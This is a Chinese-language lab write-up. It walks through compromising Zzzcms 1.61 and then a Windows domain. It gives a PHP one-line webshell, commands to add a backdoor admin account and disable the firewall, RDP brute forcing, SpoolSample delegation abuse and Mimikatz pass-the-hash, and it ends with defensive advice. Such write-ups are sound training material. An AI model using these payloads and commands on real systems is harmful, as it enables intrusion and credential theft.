cyberstrikelab lab8 wp
字数 1059 2025-08-29 22:41:32

Zzzcms 1.61 渗透测试实战教学文档

信息收集阶段

  1. 初始扫描

    • 使用fscan进行全端口扫描,识别开放服务
    • 发现存在一个基于Zzzcms的网站
  2. CMS识别

    • 确认CMS版本为Zzzcms 1.61
    • 该版本存在已知的后台远程命令执行漏洞

漏洞利用

Zzzcms 1.61 后台远程命令执行漏洞

  1. 初始访问

    • 使用弱口令组合:admin/admin123456 成功登录后台
  2. 漏洞利用步骤

    • 进入"本地模板管理"功能
    • 找到并编辑search.html模板文件
    • 修改内容为PHP代码(如<?php phpinfo();?>
    • 保存后访问相应页面验证代码执行
  3. WebShell植入

    • 将模板内容替换为一句话木马(如<?php eval($_POST['cmd']);?>
    • 使用蚁剑等工具尝试连接(注意:实际环境中可能因杀软拦截而失败)

内网渗透

横向移动技术

  1. 代理搭建

    • 使用Stowaway代理工具建立内网通道
    • 通过代理上传免杀木马文件
  2. 权限提升

    • 使用"土豆"提权工具获取系统权限
    • 执行命令:
      net user hacker P@ssw0rd /add
      net localgroup administrators hacker /add
      netsh advfirewall set allprofiles state off
      
  3. 内网信息收集

    • 检查网络配置:ipconfig /all
    • 扫描C段(如10.5.5.0/24)
    • 发现10.5.5.33主机开放3389端口
  4. 凭证爆破

    • 使用爆破工具尝试RDP登录
    • 成功凭证:administrator/admin@123456

域渗透技术

  1. 域信息收集

    • 使用CS的svc-exe提权到SYSTEM
    • 执行命令收集域信息:
      net group "Domain Admins" /domain
      net group "Domain Computers" /domain
      
  2. 非约束委派利用

    • 发现cyberweb主机配置了非约束委派
    • 利用打印机漏洞(SpoolSample)强制域控访问受控主机
    • 使用工具:
      .\SpoolSample.exe DC01 WEB01
      
  3. 凭证窃取

    • 使用Mimikatz导出域控的NTLM哈希:
      mimikatz.exe "sekurlsa::tickets /export"
      
    • 执行Pass-the-Hash攻击:
      mimikatz.exe "sekurlsa::pth /user:Administrator /domain:cyberlab /ntlm:<hash>"
      

参考资源

  1. Zzzcms漏洞分析:

    • https://xz.aliyun.com/news/4103
    • https://zhuanlan.zhihu.com/p/58909740
  2. 非约束委派利用:

    • https://forum.butian.net/share/1591

防御建议

  1. 针对Zzzcms

    • 及时升级到最新版本
    • 修改默认管理员密码为强密码
    • 限制后台模板编辑权限
  2. 内网防护

    • 启用防火墙并配置严格规则
    • 监控异常账户添加行为
    • 禁用非必要的委派配置
  3. 域安全

    • 定期检查域内委派配置
    • 监控Kerberos认证异常
    • 启用LSA保护防止凭据窃取

本教学文档完整呈现了从外网渗透到域控控制的完整攻击链,重点突出了Zzzcms漏洞利用、内网横向移动和域渗透技术的关键步骤。

Zzzcms 1.61 渗透测试实战教学文档 信息收集阶段 初始扫描 使用fscan进行全端口扫描,识别开放服务 发现存在一个基于Zzzcms的网站 CMS识别 确认CMS版本为Zzzcms 1.61 该版本存在已知的后台远程命令执行漏洞 漏洞利用 Zzzcms 1.61 后台远程命令执行漏洞 初始访问 使用弱口令组合: admin/admin123456 成功登录后台 漏洞利用步骤 进入"本地模板管理"功能 找到并编辑 search.html 模板文件 修改内容为PHP代码(如 <?php phpinfo();?> ) 保存后访问相应页面验证代码执行 WebShell植入 将模板内容替换为一句话木马(如 <?php eval($_POST['cmd']);?> ) 使用蚁剑等工具尝试连接(注意:实际环境中可能因杀软拦截而失败) 内网渗透 横向移动技术 代理搭建 使用Stowaway代理工具建立内网通道 通过代理上传免杀木马文件 权限提升 使用"土豆"提权工具获取系统权限 执行命令: 内网信息收集 检查网络配置: ipconfig /all 扫描C段(如10.5.5.0/24) 发现10.5.5.33主机开放3389端口 凭证爆破 使用爆破工具尝试RDP登录 成功凭证: administrator/admin@123456 域渗透技术 域信息收集 使用CS的svc-exe提权到SYSTEM 执行命令收集域信息: 非约束委派利用 发现 cyberweb 主机配置了非约束委派 利用打印机漏洞(SpoolSample)强制域控访问受控主机 使用工具: 凭证窃取 使用Mimikatz导出域控的NTLM哈希: 执行Pass-the-Hash攻击: 参考资源 Zzzcms漏洞分析: https://xz.aliyun.com/news/4103 https://zhuanlan.zhihu.com/p/58909740 非约束委派利用: https://forum.butian.net/share/1591 防御建议 针对Zzzcms 及时升级到最新版本 修改默认管理员密码为强密码 限制后台模板编辑权限 内网防护 启用防火墙并配置严格规则 监控异常账户添加行为 禁用非必要的委派配置 域安全 定期检查域内委派配置 监控Kerberos认证异常 启用LSA保护防止凭据窃取 本教学文档完整呈现了从外网渗透到域控控制的完整攻击链,重点突出了Zzzcms漏洞利用、内网横向移动和域渗透技术的关键步骤。